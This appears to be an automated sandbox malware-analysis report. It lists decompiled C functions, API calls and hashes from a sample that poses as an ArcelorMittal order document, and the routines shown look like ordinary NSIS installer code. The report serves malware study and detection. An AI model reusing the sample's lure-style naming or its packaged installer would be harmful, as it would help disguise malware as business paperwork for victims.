                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-3355392842
                                                              • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                              • Instruction ID: ee04230c76b470484a65779322a078522fef8bc0a4cae86812832761b4080375
                                                              • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                              • Instruction Fuzzy Hash: 30D0A7711019306AC121EB449C04DDF629CAF45300341443FF501B30A2C77C5D618BFE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00402D8A(intOrPtr _a4) {
                                                              				long _t2;
                                                              				struct HWND__* _t3;
                                                              				struct HWND__* _t6;
                                                              
                                                              				if(_a4 == 0) {
                                                              					__eflags =  *0x7976f8; // 0x0
                                                              					if(__eflags == 0) {
                                                              						_t2 = GetTickCount();
                                                              						__eflags = _t2 -  *0x7a8a4c;
                                                              						if(_t2 >  *0x7a8a4c) {
                                                              							_t3 = CreateDialogParamW( *0x7a8a40, 0x6f, 0, E00402D04, 0);
                                                              							 *0x7976f8 = _t3;
                                                              							return ShowWindow(_t3, 5);
                                                              						}
                                                              						return _t2;
                                                              					} else {
                                                              						return E00406444(0);
                                                              					}
                                                              				} else {
                                                              					_t6 =  *0x7976f8; // 0x0
                                                              					if(_t6 != 0) {
                                                              						_t6 = DestroyWindow(_t6);
                                                              					}
                                                              					 *0x7976f8 = 0;
                                                              					return _t6;
                                                              				}
                                                              			}






                                                              0x00402d91
                                                              0x00402dab
                                                              0x00402db1
                                                              0x00402dbb
                                                              0x00402dc1
                                                              0x00402dc7
                                                              0x00402dd8
                                                              0x00402de1
                                                              0x00000000
                                                              0x00402de6
                                                              0x00402ded
                                                              0x00402db3
                                                              0x00402dba
                                                              0x00402dba
                                                              0x00402d93
                                                              0x00402d93
                                                              0x00402d9a
                                                              0x00402d9d
                                                              0x00402d9d
                                                              0x00402da3
                                                              0x00402daa
                                                              0x00402daa

                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403517,?), ref: 00402D9D
                                                              • GetTickCount.KERNEL32 ref: 00402DBB
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000000,00403517,?), ref: 00402DE6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
                                                              • Instruction ID: 43aedd9bd01b98b6f78ee00b952d30abd1abf30aba01f835b52ba634ff97d244
                                                              • Opcode Fuzzy Hash: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
                                                              • Instruction Fuzzy Hash: 1AF05E30516A22EBC6916B14FF4DE8B7B64AB80B1171684BBF051B11E4CA7C0C82CB9C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00403B51(void* __ecx, void* __eflags) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short _t6;
                                                              				intOrPtr _t11;
                                                              				signed int _t13;
                                                              				signed int _t16;
                                                              				signed short* _t18;
                                                              				signed int _t20;
                                                              				signed short* _t23;
                                                              				intOrPtr _t25;
                                                              				signed int _t26;
                                                              				intOrPtr* _t27;
                                                              
                                                              				_t24 = L"1033";
                                                              				_t13 = 0xffff;
                                                              				_t6 = E00405F92(__ecx, L"1033");
                                                              				while(1) {
                                                              					_t26 =  *0x7a8a84;
                                                              					if(_t26 == 0) {
                                                              						goto L7;
                                                              					}
                                                              					_t16 =  *( *0x7a8a50 + 0x64);
                                                              					_t20 =  ~_t16;
                                                              					_t18 = _t16 * _t26 +  *0x7a8a80;
                                                              					while(1) {
                                                              						_t18 = _t18 + _t20;
                                                              						_t26 = _t26 - 1;
                                                              						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                              							break;
                                                              						}
                                                              						if(_t26 != 0) {
                                                              							continue;
                                                              						}
                                                              						goto L7;
                                                              					}
                                                              					 *0x7a7a20 = _t18[1];
                                                              					 *0x7a8ae8 = _t18[3];
                                                              					_t23 =  &(_t18[5]);
                                                              					if(_t23 != 0) {
                                                              						 *0x7a7a1c = _t23;
                                                              						E00405F79(_t24,  *_t18 & 0x0000ffff);
                                                              						SetWindowTextW( *0x7a1f20, E00406054(_t13, _t24, _t26, "Overcaustically Setup", 0xfffffffe));
                                                              						_t11 =  *0x7a8a6c;
                                                              						_t27 =  *0x7a8a68;
                                                              						if(_t11 == 0) {
                                                              							L15:
                                                              							return _t11;
                                                              						}
                                                              						_t25 = _t11;
                                                              						do {
                                                              							_t11 =  *_t27;
                                                              							if(_t11 != 0) {
                                                              								_t11 = E00406054(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                              							}
                                                              							_t27 = _t27 + 0x818;
                                                              							_t25 = _t25 - 1;
                                                              						} while (_t25 != 0);
                                                              						goto L15;
                                                              					}
                                                              					L7:
                                                              					if(_t13 != 0xffff) {
                                                              						_t13 = 0;
                                                              					} else {
                                                              						_t13 = 0x3ff;
                                                              					}
                                                              				}
                                                              			}
















                                                              0x00403b55
                                                              0x00403b5a
                                                              0x00403b60
                                                              0x00403b65
                                                              0x00403b65
                                                              0x00403b6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00403b75
                                                              0x00403b7d
                                                              0x00403b7f
                                                              0x00403b85
                                                              0x00403b85
                                                              0x00403b87
                                                              0x00403b93
                                                              0x00000000
                                                              0x00000000
                                                              0x00403b97
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403b99
                                                              0x00403b9e
                                                              0x00403ba7
                                                              0x00403bad
                                                              0x00403bb2
                                                              0x00403bc6
                                                              0x00403bd1
                                                              0x00403be9
                                                              0x00403bef
                                                              0x00403bf4
                                                              0x00403bfc
                                                              0x00403c1d
                                                              0x00403c1d
                                                              0x00403c1d
                                                              0x00403bfe
                                                              0x00403c00
                                                              0x00403c00
                                                              0x00403c04
                                                              0x00403c0b
                                                              0x00403c0b
                                                              0x00403c10
                                                              0x00403c16
                                                              0x00403c16
                                                              0x00000000
                                                              0x00403c00
                                                              0x00403bb4
                                                              0x00403bb9
                                                              0x00403bc2
                                                              0x00403bbb
                                                              0x00403bbb
                                                              0x00403bbb
                                                              0x00403bb9

                                                              APIs
                                                              • SetWindowTextW.USER32(00000000,Overcaustically Setup), ref: 00403BE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID: 1033$Overcaustically Setup
                                                              • API String ID: 530164218-3667396766
                                                              • Opcode ID: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
                                                              • Instruction ID: e987bbb99f4ce20eb3fe8b814340f1a9c458372fd2df2122c6df2ee7e0325558
                                                              • Opcode Fuzzy Hash: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
                                                              • Instruction Fuzzy Hash: 1D11D132B046109BC724DF15DC80A7777BCEBC6719728C17BE901A73A2DA3DAE018799
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E00405105(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                              				int _t15;
                                                              				long _t16;
                                                              
                                                              				_t15 = _a8;
                                                              				if(_t15 != 0x102) {
                                                              					if(_t15 != 0x200) {
                                                              						_t16 = _a16;
                                                              						L7:
                                                              						if(_t15 == 0x419 &&  *0x7a1f2c != _t16) {
                                                              							_push(_t16);
                                                              							_push(6);
                                                              							 *0x7a1f2c = _t16;
                                                              							E00404ADB();
                                                              						}
                                                              						L11:
                                                              						return CallWindowProcW( *0x7a1f34, _a4, _t15, _a12, _t16);
                                                              					}
                                                              					if(IsWindowVisible(_a4) == 0) {
                                                              						L10:
                                                              						_t16 = _a16;
                                                              						goto L11;
                                                              					}
                                                              					_t16 = E00404A5B(_a4, 1);
                                                              					_t15 = 0x419;
                                                              					goto L7;
                                                              				}
                                                              				if(_a12 != 0x20) {
                                                              					goto L10;
                                                              				}
                                                              				E00404142(0x413);
                                                              				return 0;
                                                              			}





                                                              0x00405109
                                                              0x00405113
                                                              0x0040512f
                                                              0x00405151
                                                              0x00405154
                                                              0x0040515a
                                                              0x00405164
                                                              0x00405165
                                                              0x00405167
                                                              0x0040516d
                                                              0x0040516d
                                                              0x00405177
                                                              0x00000000
                                                              0x00405185
                                                              0x0040513c
                                                              0x00405174
                                                              0x00405174
                                                              0x00000000
                                                              0x00405174
                                                              0x00405148
                                                              0x0040514a
                                                              0x00000000
                                                              0x0040514a
                                                              0x00405119
                                                              0x00000000
                                                              0x00000000
                                                              0x00405120
                                                              0x00000000

                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00405134
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405185
                                                                • Part of subcall function 00404142: SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 00404154
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
                                                              • Instruction ID: dd95526c2c69af2e2475994b1a4b7019860870cbffabe27cf4c45e442f77114e
                                                              • Opcode Fuzzy Hash: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
                                                              • Instruction Fuzzy Hash: 80015A7190060CAFEF219F25DD80FAB3A26EB85354F108136FA047E2D1C77A8C919E6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004037E6() {
                                                              				void* _t2;
                                                              				void* _t3;
                                                              				void* _t6;
                                                              				void* _t8;
                                                              
                                                              				_t8 =  *0x79ff04; // 0x9c75c8
                                                              				_t3 = E004037CB(_t2, 0);
                                                              				if(_t8 != 0) {
                                                              					do {
                                                              						_t6 = _t8;
                                                              						_t8 =  *_t8;
                                                              						_t1 = _t6 + 8; // 0x10000000
                                                              						FreeLibrary( *_t1);
                                                              						_t3 = GlobalFree(_t6);
                                                              					} while (_t8 != 0);
                                                              				}
                                                              				 *0x79ff04 =  *0x79ff04 & 0x00000000;
                                                              				return _t3;
                                                              			}







                                                              0x004037e7
                                                              0x004037ef
                                                              0x004037f6
                                                              0x004037f9
                                                              0x004037f9
                                                              0x004037fb
                                                              0x004037fd
                                                              0x00403800
                                                              0x00403807
                                                              0x0040380d
                                                              0x00403811
                                                              0x00403812
                                                              0x0040381a

                                                              APIs
                                                              • FreeLibrary.KERNEL32(10000000,762E3420,00000000,C:\Users\user\AppData\Local\Temp\,004037BE,004035D3,?), ref: 00403800
                                                              • GlobalFree.KERNEL32(009C75C8), ref: 00403807
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004037E6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-3355392842
                                                              • Opcode ID: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
                                                              • Instruction ID: 7b5e820bad8908d6e9c5a6129ef56ed4de620d6e951f9557df5b5d2d3b1225d2
                                                              • Opcode Fuzzy Hash: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
                                                              • Instruction Fuzzy Hash: 90E08C334115205BC6211F14AA04B2A76BC6F49F22F19802FF880BB2608B781C424AC8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00405A32(WCHAR* _a4) {
                                                              				WCHAR* _t5;
                                                              				WCHAR* _t7;
                                                              
                                                              				_t7 = _a4;
                                                              				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                              				while( *_t5 != 0x5c) {
                                                              					_push(_t5);
                                                              					_push(_t7);
                                                              					_t5 = CharPrevW();
                                                              					if(_t5 > _t7) {
                                                              						continue;
                                                              					}
                                                              					break;
                                                              				}
                                                              				 *_t5 =  *_t5 & 0x00000000;
                                                              				return  &(_t5[1]);
                                                              			}





                                                              0x00405a33
                                                              0x00405a3d
                                                              0x00405a40
                                                              0x00405a46
                                                              0x00405a47
                                                              0x00405a48
                                                              0x00405a50
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a50
                                                              0x00405a52
                                                              0x00405a5a

                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A38
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-3370423016
                                                              • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                              • Instruction ID: 324b1dc390856c450e544e32c4aad69d139446a74aa4c59c68e3560d72017bd2
                                                              • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                              • Instruction Fuzzy Hash: 1FD05EB2400D209AD322A704DC44EAF63A8FF51300786886AF941A61A1D7785C818EA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                              				void* _v0;
                                                              				void* _t17;
                                                              				signed int _t19;
                                                              				void* _t20;
                                                              				void* _t24;
                                                              				void* _t26;
                                                              				void* _t30;
                                                              				void* _t36;
                                                              				void* _t38;
                                                              				void* _t39;
                                                              				signed int _t41;
                                                              				void* _t42;
                                                              				void* _t51;
                                                              				void* _t52;
                                                              				signed short* _t54;
                                                              				void* _t56;
                                                              				void* _t59;
                                                              				void* _t61;
                                                              
                                                              				 *0x1000406c = _a8;
                                                              				 *0x10004070 = _a16;
                                                              				 *0x10004074 = _a12;
                                                              				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                              				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                              				_t17 = E10001243();
                                                              				_v0 = _t17;
                                                              				_t52 = _t17;
                                                              				if( *_t17 == 0) {
                                                              					L16:
                                                              					return GlobalFree(_t17);
                                                              				} else {
                                                              					do {
                                                              						_t19 =  *_t52 & 0x0000ffff;
                                                              						_t42 = 2;
                                                              						_t54 = _t52 + _t42;
                                                              						_t61 = _t19 - 0x6c;
                                                              						if(_t61 > 0) {
                                                              							_t20 = _t19 - 0x70;
                                                              							if(_t20 == 0) {
                                                              								L12:
                                                              								_t52 = _t54 + _t42;
                                                              								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                              								L13:
                                                              								GlobalFree(_t24);
                                                              								goto L14;
                                                              							}
                                                              							_t26 = _t20 - _t42;
                                                              							if(_t26 == 0) {
                                                              								L10:
                                                              								_t52 =  &(_t54[1]);
                                                              								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                              								goto L13;
                                                              							}
                                                              							L7:
                                                              							if(_t26 == 1) {
                                                              								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                              								 *_t30 =  *0x10004040;
                                                              								 *0x10004040 = _t30;
                                                              								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                              								_t59 = _t59 + 0xc;
                                                              							}
                                                              							goto L14;
                                                              						}
                                                              						if(_t61 == 0) {
                                                              							L17:
                                                              							_t33 =  *0x10004040;
                                                              							if( *0x10004040 != 0) {
                                                              								E10001563( *0x10004074, _t33 + 4, _t41);
                                                              								_t59 = _t59 + 0xc;
                                                              								_t36 =  *0x10004040;
                                                              								GlobalFree(_t36);
                                                              								 *0x10004040 =  *_t36;
                                                              							}
                                                              							goto L14;
                                                              						}
                                                              						_t38 = _t19 - 0x4c;
                                                              						if(_t38 == 0) {
                                                              							goto L17;
                                                              						}
                                                              						_t39 = _t38 - 4;
                                                              						if(_t39 == 0) {
                                                              							 *_t54 =  *_t54 + 0xa;
                                                              							goto L12;
                                                              						}
                                                              						_t26 = _t39 - _t42;
                                                              						if(_t26 == 0) {
                                                              							 *_t54 =  *_t54 + 0xa;
                                                              							goto L10;
                                                              						}
                                                              						goto L7;
                                                              						L14:
                                                              					} while ( *_t52 != 0);
                                                              					_t17 = _v0;
                                                              					goto L16;
                                                              				}
                                                              			}





















                                                              0x100010e6
                                                              0x100010f0
                                                              0x100010ff
                                                              0x1000110e
                                                              0x10001119
                                                              0x1000111c
                                                              0x1000112b
                                                              0x1000112f
                                                              0x10001131
                                                              0x100011d8
                                                              0x100011de
                                                              0x10001137
                                                              0x10001138
                                                              0x10001138
                                                              0x1000113d
                                                              0x1000113e
                                                              0x10001140
                                                              0x10001143
                                                              0x1000120d
                                                              0x10001210
                                                              0x100011b0
                                                              0x100011b6
                                                              0x100011bf
                                                              0x100011c4
                                                              0x100011c7
                                                              0x00000000
                                                              0x100011c7
                                                              0x10001212
                                                              0x10001214
                                                              0x10001196
                                                              0x1000119d
                                                              0x100011a5
                                                              0x00000000
                                                              0x100011a5
                                                              0x10001161
                                                              0x10001162
                                                              0x1000116a
                                                              0x10001177
                                                              0x1000117f
                                                              0x10001188
                                                              0x1000118d
                                                              0x1000118d
                                                              0x00000000
                                                              0x10001162
                                                              0x10001149
                                                              0x100011df
                                                              0x100011df
                                                              0x100011e6
                                                              0x100011f3
                                                              0x100011f8
                                                              0x100011fb
                                                              0x10001203
                                                              0x10001205
                                                              0x10001205
                                                              0x00000000
                                                              0x100011e6
                                                              0x1000114f
                                                              0x10001152
                                                              0x00000000
                                                              0x00000000
                                                              0x10001158
                                                              0x1000115b
                                                              0x100011ac
                                                              0x00000000
                                                              0x100011ac
                                                              0x1000115d
                                                              0x1000115f
                                                              0x10001192
                                                              0x00000000
                                                              0x10001192
                                                              0x00000000
                                                              0x100011c9
                                                              0x100011c9
                                                              0x100011d3
                                                              0x00000000
                                                              0x100011d7

                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
